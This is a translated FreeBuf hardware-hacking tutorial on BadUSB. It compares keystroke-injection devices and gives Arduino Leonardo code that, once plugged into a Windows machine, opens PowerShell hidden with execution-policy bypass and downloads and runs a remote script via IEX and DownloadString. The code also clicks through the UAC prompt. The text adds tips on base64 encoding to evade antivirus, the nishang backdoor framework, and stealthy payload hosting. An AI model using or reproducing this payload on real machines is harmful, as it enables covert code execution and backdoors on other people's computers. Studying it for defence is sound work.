*This article is originally written by: ya0guang. It is part of the FreeBuf original reward program, and reproduction without permission is prohibited.
Introduction
Given that hardware security is a subject that most newcomers have little exposure to, and it is very appealing, the high prices of some professional security research equipment can be daunting. In this series, the author hopes to provide interested readers with the charm of hardware security at a low cost.
This series is planned to be divided into four parts: BadUSB on Arduino; RFID on PN532; GSM on Motorola C118; SDR on RTL2832U (TV stick).
Background
BadUSB was proposed at the PacSec conference at the end of 2014, which is a vulnerability in the USB protocol — USB devices can disguise themselves as any other device, such as input devices, network cards, etc.
This vulnerability has not yet been fixed, and it can be said that with the right script, as long as it can be plugged in, nothing is safe from being compromised!
The PPT reference from 2014 is as follows:
https://srlabs.de/wp-content/uploads/2014/11/SRLabs-BadUSB-Pacsec-v2.pdf
Introduction to Common Hardware
Psychson
In fact, this is an open-source project on GitHub. Due to the hackable chips in some USB drives on the market, it can achieve BadUSB functionality through a geeky approach. However, the project has not been updated for two years, and many supported hardware has been discontinued or replaced with new main control chips. The author also tried to use it but failed.
Disguise ability: ★★★★★
Ease of development: ★★
Community support: ★★
Project homepage:
https://github.com/brandonlw/Psychson
Rubber Ducky
Its Chinese name is Rubber Duck, and it looks like an ordinary USB drive, but it hides a compromised chip. Its structure is shown in the picture, and its features include being detachable and using an SD card, allowing for easy payload replacement and excellent disguise!
As a result, the protagonist in the American drama “Mr. Robot” successfully attracted the attention of the police using this device (and hacked him). However, the Rubber Ducky from Hak5 costs $45, which is undoubtedly unaffordable for the author! Moreover, its shipping area has banned China! However, the scripts in its project are still worth referring to and learning from!
Disguise ability: ★★★★
Ease of development: ★★★☆
Community support: ★★★★
Hak5 link:
Official Payloads
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Teensy USB
A USB microcontroller development board, which can be used as a keyboard or mouse! Some models also have slots for storage cards, and the overall price is about half that of Rubber Ducky, but it’s still a bit expensive for us!
Disguise ability: ★★
Ease of development: ★★★
Community support: ★★★
Arduino Leonardo
This is the main character of today, priced between 20-40 RMB, making it the first choice for budget hackers (like me)! Moreover, Arduino programming is quite friendly for beginners. The author’s chip is shown in the picture:
First, we need to set up the Arduino, changing the “serial port” and “board” options:
Next, we start writing the payload. In fact, the payload is a series of commands executed via the keyboard to achieve certain goals, such as implanting backdoors, bouncing shells, etc. We need to keep this in mind while writing the program.
Startup Method
The basic structure of the program is as follows:
#include <Keyboard.h>void setup() { //Payload}
void loop() { //none}
It uses a Keyboard library that defines keys; some keys that cannot be input need to check the defined names, and its library file can also be found on GitHub: https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h
Of these, only setup is useful to us, which is the part that starts executing as soon as the board is powered on, i.e., when inserted, while the loop part is left empty.
The author uses Windows, and here we only discuss Windows. To execute a script or program via the keyboard in Windows, the classic way is Ctrl+R. In Windows 8 and above, after pressing the Win key + S, inputting powershell or cmd, and then pressing Enter will also start writing commands.
The code is as follows; the annoying part is that the Chinese input method can greatly avoid being attacked by BadUSB, but in our script, we can also use some default shortcuts to switch to the English input method. Moreover, Windows does not distinguish between uppercase and lowercase letters, so in some respects, just using the Caps Lock key is enough.
delay(1000);Keyboard.press(KEY_LEFT_GUI);Keyboard.press('r');Keyboard.releaseAll();delay(500);//For shift+ctrl to switch input methodKeyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_LEFT_CTRL);//For win8 and above to switch to Chinese inputKeyboard.press(KEY_LEFT_GUI);Keyboard.println(' ');//Some input methods switch between Chinese and EnglishKeyboard.press(KEY_LEFT_SHIFT);//Directly switch to EnglishKeyboard.press(KEY_CAPS_LOCK);//Manually release keysKeyboard.releaseAll();
Various Powershell Techniques
Since the “Run” dialog box is already open, the next step is to execute the code. Here we need to use some advanced techniques for starting PowerShell.
Startup Options
Entering “powershell -?” in cmd or PowerShell will give all the startup options, and here we mainly focus on two: ExecutionPolicy and WindowStyle. The default ExecutionPolicy of PowerShell is RemoteSigned.
This means that downloaded scripts must be trusted; in other words, user scripts cannot be executed. So we need to set this field to Unrestricted or Bypass. Setting WindowStyle to Hidden can help hide the window execution, which is very helpful for stealth.
For example, we can enter in the run dialog:
powershell -executionpolicy bypass -windowstyle hidden ping www.baidu.com > d:\test.txt
The content of test.txt is as follows:
Pinging www.a.shifen.com [119.75.218.70] with 32 bytes of data: Reply from 119.75.218.70: bytes=32 time=23ms TTL=53 Reply from 119.75.218.70: bytes=32 time=23ms TTL=53 Reply from 119.75.218.70: bytes=32 time=24ms TTL=53 Reply from 119.75.218.70: bytes=32 time=23ms TTL=53
Ping statistics for 119.75.218.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milliseconds: Minimum = 23ms, Maximum = 24ms, Average = 23ms
In addition, you can also execute directly from base64 encoding, which can bypass antivirus software. This is a more powerful execution technique.
Remote Execution
In fact, the purpose of bypassing is to execute scripts from a remote server. Here is a usage example:
powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://your.site/file.ps1');
This involves the power of PowerShell, which can directly create objects. The above means downloading a remote script and executing it. Obviously, remote scripts are more elegant and flexible compared to writing the payload in one line. The most important reason is that this Arduino development board has too small storage space and cannot accommodate long scripts.
Here, I recommend a PowerShell penetration framework: nishang
Project address: https://github.com/samratashok/nishang
The power of nishang lies in its ability to achieve almost everything that a backdoor can do.
As far as I know, metasploit also supports generating PowerShell payloads now.
Publicly available PowerShell scripts can be sent temporarily and stealthily through GitHub’s raw browsing service, some online text storage services, or even using ngrok to map a web server.
Bypass UAC
The subsequent code is as follows, where the latter part is to handle UAC, i.e., a pop-up user confirmation dialog.
Keyboard.println("powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://your.site/file.ps1');");Keyboard.press(KEY_LEFT_CTRL);Keyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_RETURN);Keyboard.releaseAll();delay(500);Keyboard.press(KEY_RETURN);Keyboard.press(KEY_RETURN);Keyboard.releaseAll();delay(500);Keyboard.press(KEY_RETURN);Keyboard.press(KEY_RETURN);delay(500);Keyboard.press(KEY_RETURN);Keyboard.releaseAll();delay(2500);Keyboard.press(KEY_RETURN);Keyboard.releaseAll();Keyboard.press(KEY_LEFT_ALT);Keyboard.println('y'); Keyboard.releaseAll();Keyboard.press(KEY_RETURN);Keyboard.releaseAll();delay(1500)
Conclusion
The combination of PowerShell and BadUSB can accomplish many tasks on Windows. The penetration scheme of BadUSB is not limited to keyboard input; mouse input and even network cards can also be used as attack tools. The author has seen the use of mobile phones as network cards to sniff traffic on Kali Nethunter.
Although it has been two years since the vulnerability was officially released, this vulnerability will still commonly exist in various operating systems and USB protocols for a short time. More advanced techniques still need to be explored!
*This article is originally written by: ya0guang. It is part of the FreeBuf original reward program, and reproduction without permission is prohibited.
